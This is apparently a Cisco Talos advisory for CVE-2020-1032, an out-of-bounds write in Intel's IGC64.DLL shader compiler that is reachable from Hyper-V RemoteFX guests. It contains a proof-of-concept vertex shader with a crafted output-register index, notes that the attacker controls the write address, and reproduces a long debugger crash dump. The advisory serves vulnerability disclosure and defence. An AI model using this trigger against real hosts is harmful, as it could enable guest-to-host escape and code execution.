Microsoft Hyper-V/RemoteFX: CVE-2020-1032
An exploitable memory corruption vulnerability exists in Intel’s IGC64.DLL graphics driver, version 26.20.100.7584. A specially crafted vertex shader can cause an out-of-bounds write, which could lead to arbitrary code execution. An attacker can provide a specially crafted shader file to trigger this vulnerability. This vulnerability could potentially be triggered from guest machines running on virtualization environments (e.g. VMware, QEMU, VirtualBox etc.) to perform guest-to-host escape - as it was demonstrated before in TALOS-2018-0533, TALOS-2018-0568, etc. Theoretically, this vulnerability could be also triggered from a web browser (using WebGL and WebAssembly) but Talos has not been able to confirm this.
Intel IGC64.DLL (Intel Graphics Shader Compiler for Intel(R) Graphics Accelerator), version 26.20.100.7584
Microsoft Hyper-V with RemoteFX enabled (CVE-2020-1032)
8.5 - CVSS:3.0/AV:N/AC:H/PR:L/UI:N/S:C/C:H/I:H/A:H
CWE-787: Out-of-bounds Write
This vulnerability can be triggered by supplying a malformed vertex shader, leading to an out-of-bounds write in the Intel IGC64 driver (this driver is mapped by the affected component, e.g. VMware’s vmware-vmx.exe).
Here’s an example of a vertex shader triggering the bug:
vs_4_1
dcl_globalFlags refactoringAllowed
dcl_input v0.xy
dcl_output_siv o0.xyzw, position
dcl_output o1.xyzw
dcl_output o211343.xyzw
dcl_temps 1
mul o0.xy, v0.xyxx, l(1.000000, -1.000000, 0.000000, 0.000000)
mov o0.zw, l(0,0,0.500000,1.000000)
mov r0.xy, v0.xyxx
mov r0.zw, l(0,0,0,1.000000)
mov o1.xyzw, r0.xyzw
mov o2.xyzw, r0.xyzw
ret
DCL_OUTPUT is a shader model instruction that declares a shader-output register (where oN is an output data register and N is an integer that denotes the register number).
By supplying a specially crafted N value, it is possible to trigger the memory corruption vulnerability in the IGC64 driver.
Important fact is that the attacker can control the RBX register (used as index for destination memory address calculation) since this value is taken directly from the shader. This allows an attacker to control the destination address for arbitrary memory write.
0:000> r
rax=000001fb07205920 rbx=0000000000033993 rcx=000001fb07206408
rdx=000001fb031272e8 rsi=000001fb03139090 rdi=000001fb03139078
rip=00007ffc70ae85b0 rsp=0000007b978fdbe0 rbp=0000007b978fdce0
r8=000000000000000d r9=000001fb072063f0 r10=000001fb072063f0
r11=0000000000000000 r12=000001fb03138f50 r13=0000000000000000
r14=000001fb03132bb8 r15=000001fb03132b98
iopl=0 nv up ei pl nz na pe nc
cs=0033 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010202
igc64!GTPIN_IGC_OCL_UpdateKernelInfo+0x177bf0:
00007ffc`70ae85b0 48893cd8 mov qword ptr [rax+rbx*8],rdi ds:000001fb`073a25b8=????????????????
Stack trace:
0:000> kb
# RetAddr : Args to Child : Call Site
00 00007ffc`70ae90be : 00007ffc`71b0a530 000001fb`03134920 000001fb`03138ef8 000001fb`03138ef8 : igc64!GTPIN_IGC_OCL_UpdateKernelInfo+0x177bf0
01 00007ffc`711854e9 : 000001fb`03139520 000001fb`03138ef8 00000000`00000000 000001fb`031438e0 : igc64!GTPIN_IGC_OCL_UpdateKernelInfo+0x1786fe
02 00007ffc`71185673 : 000001fb`03138f30 000001fb`03140670 000001fb`0312c800 000001fb`00000000 : igc64!getJITVersion+0x4987a9
03 00007ffc`7118587d : 00000000`00000000 000001fb`0312c940 0000007b`978fe029 000001fb`0313d101 : igc64!getJITVersion+0x498933
04 00007ffc`71184e80 : 00007ffc`7092f400 000001fb`0313d400 000001fb`00000000 00007ffc`00000002 : igc64!getJITVersion+0x498b3d
05 00007ffc`70a216f5 : 00007ffc`7092f410 0000007b`978fe1d0 000001fb`03126730 000001fb`072bce40 : igc64!getJITVersion+0x498140
06 00007ffc`7130bc37 : 000001fb`03124b08 000001fb`0312b8f0 000001fb`03126730 000001fb`03126730 : igc64!GTPIN_IGC_OCL_UpdateKernelInfo+0xb0d35
07 00007ffc`7130ce3d : 000001fb`03124ad0 00007ffc`75013537 ffffffff`00000000 00000000`00000000 : igc64!OpenCompiler12+0x44a7
08 00007ffc`749a00d7 : 000001fb`031249e8 00000000`00000000 000001fb`010d77b0 00000000`00000001 : igc64!OpenCompiler12+0x56ad
09 00007ffc`750c6fab : 000001fb`010e3c60 00000000`00000003 000001fb`03126080 0000007b`978fe460 : igd10iumd64!OpenAdapter10_2+0xd8ab7
0a 00007ffc`7cc29874 : 00000000`00000000 000001fb`031244b8 000001fb`010cd890 00000000`00000000 : igd10iumd64!OpenAdapter10_2+0x7ff98b
0b 00007ffc`7cc32563 : 000001fb`010d77a8 00000000`00000000 000001fb`031244b8 000001fb`010cd890 : d3d11!CVertexShader::CLS::FinalConstruct+0x260
0c 00007ffc`7cc32726 : 0000007b`978fefa0 00007ffc`7cde2388 000001fb`03124380 00000000`00001238 : d3d11!CLayeredObjectWithCLS<CVertexShader>::FinalConstruct+0xa3
0d 00007ffc`7cc1ee08 : 000001fb`031243a8 0000007b`978fefa0 0000007b`978fefd0 00007ffc`7cde2388 : d3d11!CLayeredObjectWithCLS<CVertexShader>::CreateInstance+0x152
0e 00007ffc`7cc2b17d : 00000000`00000000 000001fb`03124380 00000000`00000000 00000000`00000000 : d3d11!CDevice::CreateLayeredChild+0xc38
0f 00007ffc`7cc2b950 : 000001fb`03124380 00000000`00000007 00000000`00000850 00000000`00000030 : d3d11!NDXGI::CDevice::CreateLayeredChild+0x6d
10 00007ffc`7cc11b00 : 000001fb`0729a6d0 00000000`00000007 00000000`0000000a 000001fb`0729af48 : d3d11!NOutermost::CDevice::CreateLayeredChild+0x1b0
11 00007ffc`7cc11a68 : 00000000`0000000a 00000000`0000c100 0000007b`978ff3c0 00000000`00000000 : d3d11!CDevice::CreateAndRecreateLayeredChild<SD3D11LayeredVertexShaderCreationArgs>+0x64
12 00007ffc`7cc11838 : 00000000`80070057 000001fb`03123de0 00000000`00000298 00000000`00000000 : d3d11!CDevice::CreateVertexShader_Worker+0x1b8
13 00007ff7`3e80261e : 00007ff7`3e875178 000001fb`00ff0000 000001fb`031381b0 00000000`00000001 : d3d11!CDevice::CreateVertexShader+0x28
14 00007ff7`3e8042a7 : 000001fb`010063c0 00000000`00000298 000001fb`0729af18 00000000`00000000 : POC_EXEC11+0x261e
15 00007ff7`3e80c880 : 00000000`00000000 000001fb`01059bc4 000001fb`01031d90 000001fb`00000298 : POC_EXEC11+0x42a7
16 00007ff7`3e80a8cc : 00000000`00000000 00000000`00000000 00000000`00000001 00007ffc`00000000 : POC_EXEC11+0xc880
17 00007ff7`3e80a26c : 00000000`00000000 0050005f`006e006f 00000000`00000000 0063006f`0070005c : POC_EXEC11+0xa8cc
18 00007ff7`3e80324a : 000001fb`01031d90 00000000`00000000 000001fb`01031d90 000001fb`00ffce30 : POC_EXEC11+0xa26c
19 00007ff7`3e82f5aa : 00000000`0000000a 00000000`00000000 00000000`00000000 00000000`00000000 : POC_EXEC11+0x324a
1a 00007ffc`82497bd4 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : POC_EXEC11+0x2f5aa
1b 00007ffc`8380ced1 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : KERNEL32!BaseThreadInitThunk+0x14
1c 00000000`00000000 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : ntdll!RtlUserThreadStart+0x21
0:000> !analyze -v
*******************************************************************************
* *
* Exception Analysis *
* *
*******************************************************************************
KEY_VALUES_STRING: 1
Key : AV.Fault
Value: Write
Key : Analysis.CPU.Sec
Value: 1
Key : Analysis.Elapsed.Sec
Value: 97
Key : Analysis.Memory.CommitPeak.Mb
Value: 70
Key : Timeline.OS.Boot.DeltaSec
Value: 120876
Key : Timeline.Process.Start.DeltaSec
Value: 803
PROCESSES_ANALYSIS: 1
SERVICE_ANALYSIS: 1
STACKHASH_ANALYSIS: 1
TIMELINE_ANALYSIS: 1
Timeline: !analyze.Start
Name: <blank>
Time: 2020-01-12T13:04:43.691Z
Diff: 691 mSec
Timeline: Dump.Current
Name: <blank>
Time: 2020-01-12T13:04:43.0Z
Diff: 0 mSec
Timeline: Process.Start
Name: <blank>
Time: 2020-01-12T12:51:20.0Z
Diff: 803000 mSec
Timeline: OS.Boot
Name: <blank>
Time: 2020-01-11T03:30:07.0Z
Diff: 120876000 mSec
DUMP_CLASS: 2
DUMP_QUALIFIER: 0
MODLIST_WITH_TSCHKSUM_HASH: 72b14d4437af6d09da2d9fe2a592f06ddf20b1ca
MODLIST_SHA1_HASH: 6ce0e83b6da7c6a553d1e322f42f958f3d7a27e9
NTGLOBALFLAG: 70
APPLICATION_VERIFIER_FLAGS: 0
PRODUCT_TYPE: 1
SUITE_MASK: 272
DUMP_TYPE: fe
FAULTING_IP:
igc64!GTPIN_IGC_OCL_UpdateKernelInfo+177bf0
00007ffc`70ae85b0 48893cd8 mov qword ptr [rax+rbx*8],rdi
EXCEPTION_RECORD: (.exr -1)
ExceptionAddress: 00007ffc70ae85b0 (igc64!GTPIN_IGC_OCL_UpdateKernelInfo+0x0000000000177bf0)
ExceptionCode: c0000005 (Access violation)
ExceptionFlags: 00000000
NumberParameters: 2
Parameter[0]: 0000000000000001
Parameter[1]: 000001fb073a25b8
Attempt to write to address 000001fb073a25b8
FAULTING_THREAD: 00003578
DEFAULT_BUCKET_ID: INVALID_POINTER_WRITE
PROCESS_NAME: POC_EXEC11.exe
FOLLOWUP_IP:
igc64!GTPIN_IGC_OCL_UpdateKernelInfo+177bf0
00007ffc`70ae85b0 48893cd8 mov qword ptr [rax+rbx*8],rdi
WRITE_ADDRESS: 000001fb073a25b8
ERROR_CODE: (NTSTATUS) 0xc0000005 - Instrukcja w 0x%p odwo a a si do pami ci pod adresem 0x%p. Pami nie mo e by %s.
EXCEPTION_CODE: (NTSTATUS) 0xc0000005 - Instrukcja w 0x%p odwo a a si do pami ci pod adresem 0x%p. Pami nie mo e by %s.
EXCEPTION_CODE_STR: c0000005
EXCEPTION_PARAMETER1: 0000000000000001
EXCEPTION_PARAMETER2: 000001fb073a25b8
WATSON_BKT_PROCSTAMP: 5e1b04b9
WATSON_BKT_MODULE: igc64.dll
WATSON_BKT_MODSTAMP: 5ddcfccd
WATSON_BKT_MODOFFSET: 2285b0
WATSON_BKT_MODVER: 26.20.100.7584
MODULE_VER_PRODUCT: Intel HD Graphics Drivers for Windows(R)
BUILD_VERSION_STRING: 18362.1.amd64fre.19h1_release.190318-1202
ANALYSIS_SESSION_HOST: IAMLEGION
ANALYSIS_SESSION_TIME: 01-12-2020 14:04:43.0691
ANALYSIS_VERSION: 10.0.18914.1001 amd64fre
THREAD_ATTRIBUTES:
OS_LOCALE: PLK
BUGCHECK_STR: APPLICATION_FAULT_INVALID_POINTER_WRITE
PRIMARY_PROBLEM_CLASS: APPLICATION_FAULT
PROBLEM_CLASSES:
ID: [0n313]
Type: [@ACCESS_VIOLATION]
Class: Addendum
Scope: BUCKET_ID
Name: Omit
Data: Omit
PID: [Unspecified]
TID: [0x3578]
Frame: [0] : igc64!GTPIN_IGC_OCL_UpdateKernelInfo
ID: [0n286]
Type: [INVALID_POINTER_WRITE]
Class: Primary
Scope: DEFAULT_BUCKET_ID (Failure Bucket ID prefix)
BUCKET_ID
Name: Add
Data: Omit
PID: [Unspecified]
TID: [0x3578]
Frame: [0] : igc64!GTPIN_IGC_OCL_UpdateKernelInfo
LAST_CONTROL_TRANSFER: from 00007ffc70ae90be to 00007ffc70ae85b0
STACK_TEXT:
0000007b`978fdbe0 00007ffc`70ae90be : 00007ffc`71b0a530 000001fb`03134920 000001fb`03138ef8 000001fb`03138ef8 : igc64!GTPIN_IGC_OCL_UpdateKernelInfo+0x177bf0
0000007b`978fde40 00007ffc`711854e9 : 000001fb`03139520 000001fb`03138ef8 00000000`00000000 000001fb`031438e0 : igc64!GTPIN_IGC_OCL_UpdateKernelInfo+0x1786fe
0000007b`978fde80 00007ffc`71185673 : 000001fb`03138f30 000001fb`03140670 000001fb`0312c800 000001fb`00000000 : igc64!getJITVersion+0x4987a9
0000007b`978fdf70 00007ffc`7118587d : 00000000`00000000 000001fb`0312c940 0000007b`978fe029 000001fb`0313d101 : igc64!getJITVersion+0x498933
0000007b`978fdfa0 00007ffc`71184e80 : 00007ffc`7092f400 000001fb`0313d400 000001fb`00000000 00007ffc`00000002 : igc64!getJITVersion+0x498b3d
0000007b`978fe090 00007ffc`70a216f5 : 00007ffc`7092f410 0000007b`978fe1d0 000001fb`03126730 000001fb`072bce40 : igc64!getJITVersion+0x498140
0000007b`978fe0d0 00007ffc`7130bc37 : 000001fb`03124b08 000001fb`0312b8f0 000001fb`03126730 000001fb`03126730 : igc64!GTPIN_IGC_OCL_UpdateKernelInfo+0xb0d35
0000007b`978fe200 00007ffc`7130ce3d : 000001fb`03124ad0 00007ffc`75013537 ffffffff`00000000 00000000`00000000 : igc64!OpenCompiler12+0x44a7
0000007b`978fe2c0 00007ffc`749a00d7 : 000001fb`031249e8 00000000`00000000 000001fb`010d77b0 00000000`00000001 : igc64!OpenCompiler12+0x56ad
0000007b`978fe300 00007ffc`750c6fab : 000001fb`010e3c60 00000000`00000003 000001fb`03126080 0000007b`978fe460 : igd10iumd64!OpenAdapter10_2+0xd8ab7
0000007b`978fe360 00007ffc`7cc29874 : 00000000`00000000 000001fb`031244b8 000001fb`010cd890 00000000`00000000 : igd10iumd64!OpenAdapter10_2+0x7ff98b
0000007b`978fe640 00007ffc`7cc32563 : 000001fb`010d77a8 00000000`00000000 000001fb`031244b8 000001fb`010cd890 : d3d11!CVertexShader::CLS::FinalConstruct+0x260
0000007b`978fe8c0 00007ffc`7cc32726 : 0000007b`978fefa0 00007ffc`7cde2388 000001fb`03124380 00000000`00001238 : d3d11!CLayeredObjectWithCLS<CVertexShader>::FinalConstruct+0xa3
0000007b`978fe950 00007ffc`7cc1ee08 : 000001fb`031243a8 0000007b`978fefa0 0000007b`978fefd0 00007ffc`7cde2388 : d3d11!CLayeredObjectWithCLS<CVertexShader>::CreateInstance+0x152
0000007b`978fe9b0 00007ffc`7cc2b17d : 00000000`00000000 000001fb`03124380 00000000`00000000 00000000`00000000 : d3d11!CDevice::CreateLayeredChild+0xc38
0000007b`978fedf0 00007ffc`7cc2b950 : 000001fb`03124380 00000000`00000007 00000000`00000850 00000000`00000030 : d3d11!NDXGI::CDevice::CreateLayeredChild+0x6d
0000007b`978fef60 00007ffc`7cc11b00 : 000001fb`0729a6d0 00000000`00000007 00000000`0000000a 000001fb`0729af48 : d3d11!NOutermost::CDevice::CreateLayeredChild+0x1b0
0000007b`978ff150 00007ffc`7cc11a68 : 00000000`0000000a 00000000`0000c100 0000007b`978ff3c0 00000000`00000000 : d3d11!CDevice::CreateAndRecreateLayeredChild<SD3D11LayeredVertexShaderCreationArgs>+0x64
0000007b`978ff1b0 00007ffc`7cc11838 : 00000000`80070057 000001fb`03123de0 00000000`00000298 00000000`00000000 : d3d11!CDevice::CreateVertexShader_Worker+0x1b8
0000007b`978ff320 00007ff7`3e80261e : 00007ff7`3e875178 000001fb`00ff0000 000001fb`031381b0 00000000`00000001 : d3d11!CDevice::CreateVertexShader+0x28
0000007b`978ff370 00007ff7`3e8042a7 : 000001fb`010063c0 00000000`00000298 000001fb`0729af18 00000000`00000000 : POC_EXEC11+0x261e
0000007b`978ff3e0 00007ff7`3e80c880 : 00000000`00000000 000001fb`01059bc4 000001fb`01031d90 000001fb`00000298 : POC_EXEC11+0x42a7
0000007b`978ff810 00007ff7`3e80a8cc : 00000000`00000000 00000000`00000000 00000000`00000001 00007ffc`00000000 : POC_EXEC11+0xc880
0000007b`978ff910 00007ff7`3e80a26c : 00000000`00000000 0050005f`006e006f 00000000`00000000 0063006f`0070005c : POC_EXEC11+0xa8cc
0000007b`978ffb30 00007ff7`3e80324a : 000001fb`01031d90 00000000`00000000 000001fb`01031d90 000001fb`00ffce30 : POC_EXEC11+0xa26c
0000007b`978ffd20 00007ff7`3e82f5aa : 00000000`0000000a 00000000`00000000 00000000`00000000 00000000`00000000 : POC_EXEC11+0x324a
0000007b`978ffd70 00007ffc`82497bd4 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : POC_EXEC11+0x2f5aa
0000007b`978ffdb0 00007ffc`8380ced1 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : KERNEL32!BaseThreadInitThunk+0x14
0000007b`978ffde0 00000000`00000000 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : ntdll!RtlUserThreadStart+0x21
STACK_COMMAND: ~0s ; .cxr ; kb
THREAD_SHA1_HASH_MOD_FUNC: d57f9bebc1f0ae522704c56a5314607d7c2652da
THREAD_SHA1_HASH_MOD_FUNC_OFFSET: c4840d003ab418e45b60d257137034e4fc87d23c
THREAD_SHA1_HASH_MOD: 64e61bfd748d413845b2f9061b27e537f8190df5
FAULT_INSTR_CODE: d83c8948
SYMBOL_STACK_INDEX: 0
SYMBOL_NAME: igc64!GTPIN_IGC_OCL_UpdateKernelInfo+177bf0
FOLLOWUP_NAME: MachineOwner
MODULE_NAME: igc64
IMAGE_NAME: igc64.dll
DEBUG_FLR_IMAGE_TIMESTAMP: 5ddcfccd
FAILURE_BUCKET_ID: INVALID_POINTER_WRITE_c0000005_igc64.dll!GTPIN_IGC_OCL_UpdateKernelInfo
BUCKET_ID: APPLICATION_FAULT_INVALID_POINTER_WRITE_igc64!GTPIN_IGC_OCL_UpdateKernelInfo+177bf0
FAILURE_EXCEPTION_CODE: c0000005
FAILURE_IMAGE_NAME: igc64.dll
BUCKET_ID_IMAGE_STR: igc64.dll
FAILURE_MODULE_NAME: igc64
BUCKET_ID_MODULE_STR: igc64
FAILURE_FUNCTION_NAME: GTPIN_IGC_OCL_UpdateKernelInfo
BUCKET_ID_FUNCTION_STR: GTPIN_IGC_OCL_UpdateKernelInfo
BUCKET_ID_OFFSET: 177bf0
BUCKET_ID_MODTIMEDATESTAMP: 5ddcfccd
BUCKET_ID_MODCHECKSUM: 2450ddb
BUCKET_ID_MODVER_STR: 0.0.0.0
BUCKET_ID_PREFIX_STR: APPLICATION_FAULT_INVALID_POINTER_WRITE_
FAILURE_PROBLEM_CLASS: APPLICATION_FAULT
FAILURE_SYMBOL_NAME: igc64.dll!GTPIN_IGC_OCL_UpdateKernelInfo
TARGET_TIME: 2020-01-12T13:06:21.000Z
OSBUILD: 18362
OSSERVICEPACK: 329
SERVICEPACK_NUMBER: 0
OS_REVISION: 0
OSPLATFORM_TYPE: x64
OSNAME: Windows 10
OSEDITION: Windows 10 WinNt SingleUserTS
USER_LCID: 0
OSBUILD_TIMESTAMP: unknown_date
BUILDDATESTAMP_STR: 190318-1202
BUILDLAB_STR: 19h1_release
BUILDOSVER_STR: 10.0.18362.1.amd64fre.19h1_release.190318-1202
ANALYSIS_SESSION_ELAPSED_TIME: 17c54
ANALYSIS_SOURCE: UM
FAILURE_ID_HASH_STRING: um:invalid_pointer_write_c0000005_igc64.dll!gtpin_igc_ocl_updatekernelinfo
FAILURE_ID_HASH: {d0d40dd5-cc0a-29d9-3f8a-fdff27d36f0d}
Followup: MachineOwner
---------
2020-01-27 - Vendor Disclosure
2020-04-01 - Disclosure deadline extended
2020-07-14 - Public Release
Discovered by Piotr Bania of Cisco Talos.